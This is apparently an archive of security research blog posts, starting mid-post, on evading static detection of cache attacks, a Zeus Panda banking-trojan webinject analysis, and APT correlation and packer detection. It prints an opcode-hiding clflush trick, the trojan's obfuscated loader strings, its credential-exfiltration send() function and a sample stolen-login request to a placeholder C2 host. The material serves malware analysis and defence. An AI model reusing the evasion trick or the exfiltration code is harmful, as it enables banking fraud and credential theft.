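    /* Linear disassembly sees:  B8 0F AE 38 90 = mov eax, 0x9038AE0F
       Execution (entry at +1):     0F AE 38    = clflush [rax], then 90 = nop */
    asm volatile(
        "lea %0, %%rax          \n\t"
        "jmp 1f                 \n\t"
        ".byte 0xB8             \n"   /* decoy mov opcode, skipped at run time */
        "1:                     \n\t"
        ".byte 0x0F, 0xAE, 0x38 \n\t" /* clflush [rax], hidden in the 'immediate' */
        "nop"
        : : "m"(line) : "rax", "memory");
    return 0;
}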

 

A peculiar niche case

We have already seen static analysis thwart these kinds of attacks in one special instance: the NaCl sandbox in Chrome. There, the code is validated during compilation and run in a sandboxed environment to make sure that none of the above tricks are used; validation will fail if a clflush instruction is generated. Unfortunately, this is not generally applicable. Nevertheless, requiring an intermediate language representation (say, LLVM bitcode) when submitting to an app store may assist the authors’ intention, but many of the issues mentioned above, including Rice’s theorem itself, apply to intermediate language representations as well.

 

Conclusion

At this point in time, attackers capable of launching microarchitectural attacks have to be considered ‘advanced’. We must therefore assume that they have ready access to malware obfuscation technology. This technology can effectively thwart classification using static analysis of executables – especially if the “feature set” is small and malleable, as a limited feature set further reduces the cost of applying obfuscation for the attacker. The feature set of MASScan is exactly that: small and malleable. Microarchitectural attacks generally have a bit of leeway for modification to blend in with benign code. Consequently, static analysis is unlikely to give defenders a real edge. It could be augmented with symbolic or even concolic analysis to improve accuracy; however, these methods scale poorly and have issues of their own. Given that it produces a <6% false positive ratio, static analysis seems a dull weapon against microarchitectural attacks. This leaves the dynamic approach, which I consider the most promising stop-gap solution.
For instance, my flush+flush detection blog post [7] and my work with Herath on detecting row hammer and cache attacks with performance counters at Black Hat 2015 [6] are examples of how detecting microarchitectural attacks can be automated in controlled environments. These methods are not without flaws either, but from an attacker’s point of view they are at least more difficult to work around, as they are often behavior-based and consequently circumvent the problem posed by Rice’s theorem. Despite progress in defense research, we remain without strong defenses against microarchitectural attacks.
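To illustrate the dynamic approach on Linux: a monitoring agent could sample hardware cache-miss counters for a suspect process via perf_event_open and flag anomalous miss rates. This is a bare-bones sketch; real detection logic, event selection and thresholds (cf. [6]) are considerably more involved:

#define _GNU_SOURCE
#include <linux/perf_event.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>

int main(void)
{
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.type = PERF_TYPE_HARDWARE;
    attr.size = sizeof(attr);
    attr.config = PERF_COUNT_HW_CACHE_MISSES;   /* last level cache misses */
    attr.disabled = 1;
    attr.exclude_kernel = 1;

    /* pid 0 / cpu -1 = this process on any CPU; a monitor would pass
       the pid of the process under suspicion instead. */
    int fd = (int)syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);
    if (fd < 0) { perror("perf_event_open"); return 1; }

    ioctl(fd, PERF_EVENT_IOC_RESET, 0);
    ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
    /* ... let the workload run for one sampling interval ... */
    ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);

    uint64_t misses = 0;
    read(fd, &misses, sizeof(misses));
    printf("LLC misses in interval: %llu\n", (unsigned long long)misses);
    close(fd);
    return 0;
}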

 

Literature

[1] Irazoqui, G., Eisenbarth, T., and Sunar, B. MASScan: Stopping Microarchitectural Attacks Before Execution. http://eprint.iacr.org/2016/1196.pdf

[2] Oren, Y., Kemerlis, V. P., Sethumadhavan, S., and Keromytis, A. D. The spy in the sandbox: Practical cache attacks in JavaScript and their implications. In Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security (New York, NY, USA, 2015), CCS ’15, ACM, pp. 1406-1418.

[3] Gruss, D., Maurice, C., and Mangard, S. Rowhammer.js: A remote software-induced fault attack in JavaScript. In Proceedings of the 13th International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment – Volume 9721 (New York, NY, USA, 2016), DIMVA 2016, Springer-Verlag New York, Inc., pp. 300-321.

[4] Gruss, D., Spreitzer, R., and Mangard, S. Cache template attacks: Automating attacks on inclusive last-level caches. In 24th USENIX Security Symposium (2015), USENIX Association, pp. 897-912.

[5] Z0mbie, “Opcode Frequency Statistics”. http://z0mbie.daemonlab.org/opcodes.html

[6] Herath, N., Fogh, A. “These Are Not Your Grand Daddys CPU Performance Counters”. Black Hat 2015. See also http://dreamsofastone.blogspot.de/2015/08/speaking-at-black-hat.html

[7] Fogh, A. Detecting stealth mode cache attacks: Flush+Flush. http://dreamsofastone.blogspot.de/2015/11/detecting-stealth-mode-cache-attacks.html

[8] Fogh, A. Row hammer, java script and MESI. http://dreamsofastone.blogspot.de/2016/02/row-hammer-java-script-and-mesi.html

Zeus Panda Webinjects: a case study

Our mothership G DATA runs an extensive automated sample processing infrastructure as part of providing up-to-date protection to its AV customers. At G DATA Advanced Analytics, we have integrated these processes within our own routines in order to maintain the fraud detection solutions we provide to our customers in the financial sector.

We have been observing an increase in Zeus Panda infections recently. When we decrypted the config files from samples of the Zeus Panda banking Trojan that went through our processing this week, we decided to take a closer look at the current features. The low-level functionality of the Zeus Panda banking Trojan is already known quite well, so we focus our analysis on the webinjects. These webinjects are used to manipulate the functionality of the targeted online banking websites on the client. The one we found here was pretty interesting. As usual, the JavaScript is protected by an obfuscation layer, which substitutes strings and function names via the following mapping array:

var _0x2f90 = ["", "\x64\x6F\x6E\x65", "\x63\x61\x6C\x6C\x65\x65", "\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x3F\x74\x69\x6D\x65\x3D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x76\x65\x72", "\x46\x46", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64", "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65", "\x63\x6F\x6D\x70\x6C\x65\x74\x65", "\x6D\x73\x69\x65\x20\x36", "\x69\x6E\x64\x65\x78\x4F\x66", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x49\x45\x36", "\x6D\x73\x69\x65\x20\x37", "\x49\x45\x37", "\x6D\x73\x69\x65\x20\x38", "\x49\x45\x38", "\x6D\x73\x69\x65\x20\x39", "\x49\x45\x39", "\x6D\x73\x69\x65\x20\x31\x30", "\x49\x45\x31\x30", "\x66\x69\x72\x65\x66\x6F\x78", "\x4F\x54\x48\x45\x52", "\x5F\x62\x72\x6F\x77\x73\x2E\x63\x61\x70", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x64\x69\x73\x70\x6C\x61\x79", "\x73\x74\x79\x6C\x65", "\x6E\x6F\x6E\x65", "\x68\x74\x6D\x6C", "\x70\x6F\x73\x69\x74\x69\x6F\x6E", "\x66\x69\x78\x65\x64", "\x74\x6F\x70", "\x30\x70\x78", "\x6C\x65\x66\x74", "\x77\x69\x64\x74\x68", "\x31\x30\x30\x25", "\x68\x65\x69\x67\x68\x74", "\x7A\x49\x6E\x64\x65\x78", "\x39\x39\x39\x39\x39\x39", "\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64", "\x23\x46\x46\x46\x46\x46\x46"];
// ... further script code ...

After deobfuscating this script, the result looks like:

var vars = ["", "done", "callee", "script", "createElement", "type", "text/javascript", "src", "?time=", "appendChild", "head", "getElementsByTagName", "ver", "FF", "addEventListener", "DOMContentLoaded", "readyState", "complete", "msie 6", "indexOf", "toLowerCase", "userAgent", "IE6", "msie 7", "IE7", "msie 8", "IE8", "msie 9", "IE9", "msie 10", "IE10", "firefox", "OTHER", "_brows.cap", "getElementById", "display", "style", "none", "html", "position", "fixed", "top", "0px", "left", "width", "100%", "height", "zIndex", "999999", "background", "#FFFFFF"];
// ... further script code ...

Taking a closer look at the now revealed functionality, we can identify the following features:

  • Browser version check, to add a browser-specific event listener (e.g. for Firefox the DOMContentLoaded event is used)
  • Setting some trojan configuration variables like:
    • botid: Unique Identifier of the compromised system
    • inject: URL to load the next attack stage
  • Load and execute further target (bank) specific JavaScript code, as defined in the inject variable.

As it turns out, the first webinject stage is a generic loader which fetches target-specific attack code from a web server. In this context, ‘target’ refers to banks and payment service providers. This is not remarkable in itself, as current webinjects tend to load the final attack code in multiple stages. But maybe this server also hosts further Zeus Panda components. So let’s take a closer look.

Target specific code and examples

After downloading the target-specific second stage of the webinject, we were surprised by the actual size of the file: 91.8 KB.

A brief analysis revealed a lot of functionality. Some of the functions are generic and work on every website; others include target-specific code, like concrete HTML attributes. For example, the webinject uses unique id attributes to identify individual pages of the online banking target. We are still investigating a lot of the included functionality at the time of writing. For now, we want to give a brief overview of selected parts of the basic functionality.

Figure 1: Flowchart of init function

After loading the target-specific JavaScript, the init function shown in Figure 1 is called. First, the function checks if it is on top of the page. If not, the showpage() function is called, which searches for the identifier _brows.cap and deletes this DOM element if present. Otherwise, the next check function, are(), is called, which searches for the strings “login”, “password” and “button”. If none of these strings can be found, the get() function is called to check whether the user is currently logged in. This is done by checking for the presence of the logout element, which is only available while the user is logged in. If not, the already described showpage() function is triggered to clean up. Otherwise, the status() function is used to set the status variable to the string “CP”. Afterwards, the collected data is exfiltrated via the send() function, described in detail in the next section.

If all target strings were found (“login”, “password” and “button”), the functions preventDefault() and stopPropagation() are called next (left branch of Figure 1). This overwrites the default form action in order to collect the data the user enters into the form. Additionally, the key event of the enter key (key code 13) is intercepted, so that the form data is captured regardless of the submit method.

As this implementation does not work in Internet Explorer, the script checks for the presence of the cancelBubble event. If present, a specific Internet Explorer implementation is called, which provides the same functionality as stopPropagation(). As in the initial webinject, different code paths exist to support all major browsers.

After collecting form input data, the function status() is called to set the branch variable, which defines the action to be triggered. In our call-flow example (left branch), the value is set to the string “SL”, which triggers a visible overlay on the website, indicating to the user that there is a temporary problem with the site. The following examples show two different target variations:

Figure 2: German example of a “temporarily unavailable” notification
Figure 3: English example from a different target

Afterwards the send() function is triggered to exfiltrate the collected data.

Exfiltration

The next interesting part in the code is the exfiltration function used during this attack stage. The collected information is handed to a function called send():
send: function () {
    // build the exfiltration URL: the C2 gate (link.gate) plus the mandatory
    // botid, hash (timestamp) and bname (target) parameters
    var l = link.gate + '?botid=' + _tables.encode(_brows.botid) + '&hash=' + new Date() + '&bname=' + _tables.get('bank');
    // append every property of every argument object as a further GET parameter
    for (var i = 0; i < arguments.length; i++) {
        for (key in arguments[i]) {
            l += '&' + key + '=' + _tables.encode(arguments[i][key]);
        }
    }
// ... further code ...
This function simply sets all collected data as GET parameters and sends an HTTPS request to a PHP backend, defined in the variable link.gate. Depending on the target website, we could observe different parameters and small differences in the construction of the parameter values. The following list gives an overview of the identified parameters. The list is not complete and some of the parameters are optional. All parameters are sent in plain text to the C2 backend.
Parameter name – Value
botid – Unique client identifier
bname – Target identifier
hash – Timestamp (new Date())
login1 – User name
login2 – User password
type – Module type (grabber, ats, intercepts)
param1 – start
domain – document.location
branch – Status to trigger different functionalities
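Assembled by send(), a complete exfiltration request could then look like this (all values below are made up for illustration; the gate URL and the exact value formats vary per campaign):

https://<c2-server>/gate.php?botid=WIN-7C2F4%2042AB11EF&hash=Fri%20Mar%2003%202017&bname=examplebank&login1=jdoe&login2=s3cret&type=grabber&param1=start&domain=banking.example.com&branch=CP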
We intend to provide further details in a follow-up post. However, now we need to talk about the backend. Behold the Zeus Panda administration panel:

Admin Panel Details

The webinject code naturally led us to C2 servers, and closer analysis led us to an admin panel on one of the servers we investigated.

Figure 4: Admin-Panel

Figure 4 displays the start screen of the Admin-Panel. Every infected machine is displayed in its own row. For every entry, the following information is listed:

  1. BotId: Unique identifier for the compromised system
  2. The active module type
  3. Job status of the entry
  4. Login credentials (username/password)
  5. Account status
  6. Victim IP address
  7. Timestamp of infection
  8. Browser version
  9. Target URL (bank)

The top navigation bar lists some available filters like format settings, drop zones and further configuration settings.

The panel is used by the attacker to see new victim machines and available actions. By clicking on the entries, the attacker can view detailed information about the compromised user. For example, details like the account balance of the victim, the amount available for transfer and even the transaction limit can be displayed. Furthermore the attacker can attach notes to the specific victim, to keep track of his fraudulent actions.

Figure 5: Admin-Panel detail view

Conclusion

Banking Trojans are still one of the most valuable sources of income for online criminals. Given that this kind of malware has been developed and optimized for many years, it is not surprising that we observe rather high code quality. With the Admin-Panel, the attacker can manage compromised machines without needing to know any technical details of the infection, making this revenue stream accessible even to the technically rather illiterate.

In the follow-up blog post, we will take a closer look into target specific webinject scripts.

Indicators of compromise

Script stage: 1st stage
IoC: SHA256 d8444c2c23e7469a518b303763edfe5fd38f9ffd11d42bfdba2663b9caf3de06
Functionality: Loader

Script stage: 1st stage, initial webinject
IoC: _brows.botid, _brows.inject
Functionality: Loader

Script stage: 2nd stage
IoC: SHA256 a99e2d6ec2a1c5b5e59c544302aa61266bb0b7d0d76f4ebed17a3906f94c2794
Functionality: Exfiltration

Script stage: 2nd stage, target specific
IoC: \.php\?(&?(botid|hash|bname|login1|login2|type|param1|domain|branch)=[^&]*){4,9}$
Functionality: Exfiltration

Authors: Manuel Körber-Bilgard and Karsten Tellmann

The Kings In Your Castle Part 5: APT correlation and do-it-yourself threat research

Welcome back to the fifth and last part of our blog series The Kings In Your Castle, where we aim to shed light on how APTs function, what targeted malware looks like and the issues we analysts might find with it. If you are interested in how it started, please check out parts 1, 2, 3 and 4; namely here, here, here and here.

In part 5, I will now describe how we leveraged our gathered data for correlations, to unveil connections among targeted attacks reported to CIRCL’s MISP instance. Furthermore, this blog looks ahead at what happened after the presentation of our proof of concept at this year’s Troopers conference in Heidelberg. Large parts of the parsing and correlation functionality have made their way into the code base of MISP. Raphael Vinot has published the MISP Workbench, where MISP users can now perform their own correlation of events found in MISP.

Corre…what?

For starters, let’s define the term “correlation”. We define this as the uncovering of links of any kind among events reported to MISP. A requirement for reports to support a correlation is that they refer to one single event and go beyond the general information already contained in MISP. Through this correlation we can glean extended knowledge of a toolset used by an actor, as well as information on target preference. We also get to know about tools or techniques shared among two or more actors. We would equally count it as a successful correlation if we find proof that two supposedly related events do not share any links at all.

A big step from classical (mass-)malware detection to the research and mitigation of targeted attacks was to recognize patterns over time. The fundamental difference between targeted and non-targeted threats is that non-targeted threats do not know and/or care about their target. While campaigns of non-targeted threats also tend to improve over time, targeted actors have a significantly more developed need to stay ahead of their victims. This way, when tracking threat actors, one might spot new additions to their toolset, new intrusion techniques or even see them picking up new “business lines”.

Also, looking at malware campaigns from a historical perspective helps uncover false flags as well as actors’ attempts to cover their tracks. This is especially significant when looking at how actors have learned to do this over time.

With all of this reasoning in mind we dug through data sets with (and, occasionally, without) structured approaches, in order to unveil hidden treasures.

Naming is hard

And frequently, when uncovering supposedly unknown links among different events, we found ourselves poking at the very same group of aggressors, using the very same malware and attack methods as the linked event would show. But how come?

There are several reasons for this, the most obvious one being that two events were reported commenting on differently named groups, but actually referring to the same one. This is an old issue in threat analytics; naming is hard. In practice, in most cases we quickly realized that each time we had a link, we were looking at identical events that were just named differently.

Probably the most popular case of multi-naming is Havex; otherwise known as EnergeticBear, DragonFly, or CrouchingYeti. This group has been mentioned in at least four different reports, with dedicated naming on all four. Similar cases have been observed for Sakula, also called BlackVine, and for WhiteElephant, also called Seven Pointed Dagger.

5_2_naming

What we found

The purpose of correlating different events was to try and find any existing links between events that were either instigated by different actors and/or performed at different points in time by the same group. For one, we wanted to prove that we could uncover links among sample sets and groups with little technical effort. For instance, we were able to spot a spear phishing attack within MISP which clearly related to other campaigns driven by an actor known as APT1, said to be a Chinese group that has performed a plenitude of attacks over the years. It is hugely beneficial to have advance knowledge of past attacks and current changes to an attacker’s toolset. This is especially true if an attack by a specific group against a given target may be imminent or already in progress.

What also turned out to be interesting was uncovering events documenting the same group, but extending the view to include the capabilities which were added over time. One example of this is TurboCampaign, first reported in 2014. By that time it went by the name of Shell_Crew. When spotted again in 2015, they sported a 64-bit Derusbi implant for Linux machines, which had not been observed earlier. It is unclear at this point whether this component was simply missed in the 2014 report or whether it was added less than a year later. That attack groups learn as they go and extend their toolsets is not surprising; but this learning process gives us exactly the kind of information we set out to find.

Other things we found in similar ways were, for example, a link between a report on The Dukes and another campaign dubbed Hammertoss; we linked an RTF spearphishing campaign from 2014 to the PittyTiger group, and we discovered a connection between RedOctober and the Inception Framework.

How to determine what’s related

We should underline again that what we did was not yet another machine learning exercise. The attributes outlined in previous episodes of this series can potentially serve in malware machine learning research, but exploring this was out of scope for what we had in mind. But what DID we do then?

We followed a rather simple approach. The set of indicators mentioned in blog post #2, combined with attributes already present within MISP, went into a Redis backend hosted on strong computing power. Redis makes it possible to perform rather quick queries on large in-memory datasets. By calculating hashes to index data items, large sets can be processed from different angles.

This way we can perform correlation runs based on IP addresses, domain names and file hashes, as well as compilation timestamps, original file names, import table hashes, ssdeep hashes and many more. As mentioned last time, targeted malware is likely not to be packed or obfuscated. It is also likely to be reused, either in its compiled form or in parts of its source code.
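
As an illustration of the backend idea – not the actual toolchain, just a minimal sketch assuming the redis-py client, with illustrative field names and key layout – correlation then boils down to set lookups:

import redis

r = redis.Redis()  # assumes a local Redis instance

# Hypothetical event record, modeled on the attributes described above
event = {
    'event_id': '1234',
    'ip-dst': '203.0.113.10',
    'imphash': 'f34d5f2d4577ed6d9ceec516c1f5a744',
    'original_filename': 'chrome.exe',
}

def index_event(ev):
    # One Redis set per (attribute, value) pair, holding the IDs of
    # all events that share this value
    for attr, value in ev.items():
        if attr != 'event_id':
            r.sadd('%s:%s' % (attr, value), ev['event_id'])

def events_with(attr, value):
    # Correlation becomes a set lookup: which events share this value?
    return r.smembers('%s:%s' % (attr, value))

index_event(event)
print(events_with('imphash', 'f34d5f2d4577ed6d9ceec516c1f5a744'))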

The following graphic illustrates a snapshot of data related to one event within MISP. One can quickly identify certain patterns, as well as absent data. Naturally, PE-specific attributes can only be retrieved from Windows PE binaries. Help on that front is provided by ssdeep hashes, which also serve for file clustering approaches.

5_3_data

Ssdeep clustering

Ssdeep, apart from computing a piece-wise hash of a given file or data blob, is capable of measuring the distance between two or among multiple ssdeep hashes. These distances are named match scores, weighted measures of how similar two given files are to each other. This is possible because ssdeep does not calculate a cryptographic hash, which would identify the entire file, but hashes of individual pieces of the file. Those can then be compared to the piecewise hashes of a different file. Naturally, this method can be extended to compare multiple files to one file, and to groups of files, calculating distances among all of them.
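
As a small illustration, assuming the python-ssdeep bindings (file names are placeholders):

import ssdeep  # python-ssdeep bindings

# Placeholder file names for two samples from a corpus
h1 = ssdeep.hash_from_file('sample_a.bin')
h2 = ssdeep.hash_from_file('sample_b.bin')

# compare() yields a match score from 0 (no similarity) to 100 (near identical)
score = ssdeep.compare(h1, h2)
print('match score: %d' % score)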

This principle allows for the clustering of files based on ssdeep hashes. The most popular implementation of ssdeep clustering, and also the one we based our toolchain on, is ssdc by Brian Wallace. As an extension to the original implementation of ssdc, we added a multi-process computation module and a Redis connector, to be able to store clustering results directly to the backend.
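
For illustration, a naive greedy version of such a clustering step could look as follows – a sketch of the principle, not ssdc’s actual algorithm, and the match score threshold is an assumption:

import ssdeep

def cluster(hashes, threshold=60):
    # Greedy single-linkage clustering: a hash joins the first cluster
    # containing a member it matches with a score of at least `threshold`,
    # otherwise it starts a new cluster
    clusters = []
    for h in hashes:
        for c in clusters:
            if any(ssdeep.compare(h, member) >= threshold for member in c):
                c.append(h)
                break
        else:
            clusters.append([h])
    return clusters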

This way we are able to spot events which are “close” to each other based on similarities within the involved binaries. With this information one could, for instance, establish that a group targeting entities within Russia is using malware which bears disturbing similarities to malware used by a (different..?) group targeting entities within Afghanistan and Tajikistan. Just saying….

Ssdeep clustering challenges

Processing fuzzy hashes is a very resource-intensive task, even more so when clustering samples of them. This doesn’t scale well for sample sets beyond a certain size. Our test set is limited, but given that most malware repositories deal with sample counts in the hundreds of thousands or more, some presorting of groups of interest might be advisable. This pre-sorting of samples which match a certain set of criteria (e.g. events within a specific timeframe, targeted platforms only, or geographical constraints) can speed up the clustering approach significantly.

Lastly, it’s worth mentioning that ssdeep hashes, just like any other statically retrieved attribute, only help describe the outer surface of a sample. They do not carry information about the purpose or behavior of a binary, are easily disturbed by runtime packers, and might even fail their purpose after malware authors apply a simple change to their compiler settings.

Taking things further: MISP Workbench

Please note that this kind of APT research has, by now, been performed by designated threat research teams for a long time, and the presented techniques are not considered new. The community benefit we see here is the integration of our toolset into MISP’s open source code body, as well as providing results and conclusions to the broader public. Research of targeted attacks is difficult without access to a large malware set and high quality threat intelligence data.

So now here we are. With MISP Workbench, the tools we developed and the data we gathered were integrated into the MISP platform in order to let incident responders and researchers easily perform their own queries when investigating one or more events.

Workbench was built with the objective of incorporating all the presented features into one single tool. It is also intended to enhance the existing MISP dataset with a rich feature set, especially regarding the presented PE features. Workbench can now be used to easily group events by attacker toolsets; in connection with MISP Galaxy this is also possible with a focus on dedicated adversaries. Workbench supports full text indexing and lookups for keywords, as well as picking through events on singular features or indicators.

The fine folks at CIRCL have built Workbench for standalone use, with a lightweight user interface. A more detailed description can be found here.

The following screenshot shows statistics about binary compilation timestamps within our targeted malware test set. One can quickly see how 1970 and 1992 must have been very busy years for lots of malware authors. Err… kidding, of course: a zeroed-out timestamp field decodes to January 1970, the start of the Unix epoch, and Delphi compilers are known to stamp binaries with a fixed date in June 1992. But it does seem obvious how compilation timestamps, or even just parts of compilation timestamps, can occasionally serve as an interesting grouping attribute.

5_3_data2

Furthermore, Workbench in combination with Galaxy supplies information about threat actors and the events linked to them. This enables the analyst to search for links among threat actors on a binary feature level.

5_3_grouping

As mentioned, the extracted PE features can be used for grouping as well. The following screenshot shows how the filename ‘chrome.exe’ seems to be an all-time favorite of The Dukes, a threat actor operating out of Russia.

5_3_orifname

Finally

And here it ends, this lengthy blog series on Kings In Your Castle. The work will continue, of course. The tools presented, just as any information sharing platform such as MISP, live from the collective effort of contributing to the tool stack, the threat information base and the distribution chain. In that sense, questions and comments are welcome, just like pull requests, bug reports and feature ideas. At this point let me say thank you once more to my co-sufferer Raphael Vinot, as well as the team at CIRCL, the team at ERNW and the Troopers conference for letting us present our work, and to Morgan Marquis-Boire for supplying samples and ever more samples.

Happy APT hunting everyone 🙂

The Kings In Your Castle Part 4 – Packers, Crypters and a Pack of RATs

In part 4 of our series “The Kings In Your Castle”, we’re back with the question: what does sophistication even mean? I’ll be outlining what complexity means from a malware analyst’s perspective, why malware intends to be undecipherable and why it sometimes wouldn’t even try. Also, this blog entry serves to present our findings on commodity RATs within the corpus of malware we analyzed, as part of our talk at the Troopers conference in March.

If you are interested in the previous parts of the series, please check them out here, here and here.

What does sophistication even mean?

The complexity of software is a rather soft metric that hasn’t undergone much scrutiny in definition. For a malware analyst, this sphere takes on a whole lot of different shades, as malware by nature aims to hide its threats. At least most of it does, or so one would think.

For analysts, what poses challenges are techniques such as code obfuscation or the use of well-fortified crypters. What also presents a remarkable challenge is structured application design, although this might sound somewhat counter-intuitive. Multi-component malware with a well thought-out object-oriented design and highly dependent components causes more of a headache for an analyst than any crypter out there. In fact, many of the well-known high-profile attack toolsets aren’t protected by a packer at all. The assumption is that, for one, runtime packers potentially catch unwanted attention from security products; but also, for highly targeted attacks they might not even be necessary at all. Malware developers with sufficient dedication are very well able to hide a software’s purpose without the use of a runtime packer. So, why do we still see packed malware?

A software crypter is a piece of technology which obfuscates software and its intentions, but also changes its appearance. Crypters and packers are frequently applied to malware in order to ensure the reusability of the actual malcode. That way, when malware is detected once, the same detection will not apply to the same malware running on a different system.

Let’s take a step back though. The ‘perfect targeted attack’ is performed with a toolset dedicated to one target only. We can conclude that a crypter is needed if either the authors aren’t capable of writing undetectable malware or, more likely, if the malware is intended to be reused. This makes sense if you consider that writing malware takes time and money; a custom attack toolset represents an actual (and quite substantial) investment.

Finally, with economic aspects in mind, we can conclude that attacks performed with plain tools are the more expensive ones, while attacks using packers and crypters to protect malware are less resource-intensive.

4_1_sophistication

The actual hypothesis we had started our research with was that most targeted malware comes without a crypter. In more detail, we put up the statement that targeted malware is significantly less protected than random malicious software. Again, random malware doesn’t know its target and by definition is intended to infect a large number of individuals, while targeted malware supposedly is designed for a limited number of targets.

Packer Detection (Like PEiD Was Broken)

Now, the usage statistics of runtime packers and crypters would be easy to gather from our dataset if the available state-of-the-art packer detection tools weren’t stuck somewhere in 1997. In practice, the question of whether a file is packed or not is not trivially answered. One of the tools frequently used to identify packers is named PEiD. PEiD applies pre-defined signatures to the first code bytes starting from the executable entry point, which easily fails if the code at the packed binary’s entry point changes only slightly.

Aiming for more accurate results, we decided to come up with our own packer evaluation. We put together a set of indicators for abnormal binary structures, which are frequently seen in relation with runtime packers. Please note, the indicators are just that – indicators. The evaluation algorithm leaves some space for discrepancies. In practice though, manual analysis of randomly picked samples has proven the evaluation to be reasonably precise.

We gathered the following PE attributes:

  • Section count smaller than 3
  • Count of TLS sections bigger than 0
  • No imphash value present, thus import section empty or not parseable
  • Entropy value of code section smaller than 6.0 or bigger than 6.7
  • Entry point located in section which is not named ‘.text’, ‘.itext’ or ‘.CODE’
  • Ratio of Windows API calls to file size smaller than 0.1

Of course, no single one of the gathered attributes is a surefire indicator in a packer evaluation process. In reality, some of the mentioned presumed anomalies are frequently seen within unpacked binaries, and depend, for example, on the executable’s compiler. Nevertheless, any of the mentioned features is reason enough to grow suspicion, and as mentioned before, the evaluation works rather reliably on our chosen dataset.

According to our algorithm, the values weigh into an evaluation score; based on the final score, an analyst can then draw his conclusions. It is worth noting at this point that the chosen thresholds are quite sensitive, and one would expect to detect too many “potentially packed” samples rather than too few.
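
To illustrate the principle, here is a reduced sketch of such an evaluation based on the pefile library. The thresholds follow the indicator list above, but the weighting is illustrative and the API-call-to-file-size ratio is omitted (it requires disassembly), so this is not the published implementation:

import pefile

def packer_score(path):
    # Rough packer-indicator score for a PE file; higher = more suspicious
    pe = pefile.PE(path)
    score = 0
    if len(pe.sections) < 3:                    # suspiciously few sections
        score += 40
    if hasattr(pe, 'DIRECTORY_ENTRY_TLS'):      # TLS directory present
        score += 40
    if not pe.get_imphash():                    # import table empty or unparseable
        score += 40
    ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
    for sec in pe.sections:
        if sec.VirtualAddress <= ep < sec.VirtualAddress + sec.Misc_VirtualSize:
            name = sec.Name.rstrip(b'\x00').decode('ascii', errors='replace')
            if name not in ('.text', '.itext', '.CODE'):  # unusual entry point section
                score += 40
            entropy = sec.get_entropy()
            if entropy < 6.0 or entropy > 6.7:  # entropy outside the typical code range
                score += 40
            break
    return score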

Further details about our packer evaluation method can be found within the published code.

The results can be found in the following charts, showing the evaluation values in relation to sample counts. The maximum score a sample can reach on our scale is 220, meaning that all evaluation attributes exceed their chosen thresholds. The following graphics show the evaluation performed on a benign sample set, on a targeted malware sample set and on a random malware sample set. Attention should be paid to the sample frequency count on the y-axis of each graph.

The benign set
The targeted malware set
The random malware set

The graphs show very well how roughly a third of the benign samples show low-rated indicators, while for the random malware set less than a third of the overall set shows no indicators and more than a third shows remarkably high-rated indicators. It shall be mentioned that a look into the benign samples rated at 40-50 revealed that most of them were packed with UPX, a binary packer used mainly for compression.

The remarkable bit at this point is that the set of targeted malware binaries has the overall lowest count of packer indicators. This leaves us with two possible conclusions. Following our hypothesis that targeted malware is significantly less protected by crypters than random malware, we take this result as proof.

On the other hand, what surely biases the result is that the chosen attributes are potentially influenced by the compilers used to compile the given binaries. Since the results for the targeted set are notably homogeneous, though, this suggests that the larger part of the targeted malware within our dataset has not been built with exotic compilers either. As a research idea for future analysis, I’d like to put up the somewhat far-fetched hypothesis that most targeted malware is written in C/C++ and compiled using the Visual Studio compiler. Curious, anyone?

Commodity RATs

Taking the question of malware sophistication further: in the past, the analysis community was frequently astonished in the light of yet another incredibly complex targeted malware campaign. While it is true that certain targets require a high level of attack sophistication, most campaigns do not require components for proprietary systems or extremely stealthy methods. An interesting case of high-profile attacks being carried out with commodity malware was uncovered last year, when CitizenLab published their report about Packrat, a South American threat actor who has been active for around seven years, performing targeted espionage and disinformation campaigns in various South American countries. The actor is most known for targeting, among others, Alberto Nisman, the late Argentinean prosecutor who raised a case against the Argentinean government in 2015.

Whoever is responsible for said campaigns did have a clear image of whom to target. The actor certainly possessed sufficient personal and financial resources, yet made a conscious decision not to invest in a high-end toolchain. Looking into the malware set used by Packrat, one finds a list of so-called commodity RATs, off-the-shelf malware used for remote access and espionage. The list of RATs includes CyberGate, XTremeRAT and AlienSpy; these tools themselves are well-known malware families associated with espionage.

Again, using repackaged commodity RATs is notably cheaper than writing custom malware. The key to remaining stealthy in this case is the usage of crypters and packers. In the end though, by not burning resources on a custom toolchain, the attacker can apply his resources otherwise – potentially even on increasing his target count.

Hunting down a RAT pack

Looking at the above facts, one question emerges: how prevalent are pre-built RATs within the analysis set at all? To establish a count of commodity RATs, we again relied on the detection names of Microsoft Defender. The anti-virus solution from Microsoft has in the past shown itself to be rather slow in picking up new detections, while providing quite accurate results once detections are deployed to the engines. Accuracy at this point includes a certain reliability when it comes to naming malware.

For evaluation, we chose to search for the following list of commodity malware:

  • DarkComet (Fynloski)
  • BlackShades (njRat, Bladabindi)
  • Adwind
  • PlugX
  • PoisonIvy (Poison)
  • XTremeRAT (Xtrat)
  • Handpicked RAT binaries

The selected set is what we noticed seeing when going through the malware corpus manually; please note, though, that the list of existing commodity RATs is far longer.
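
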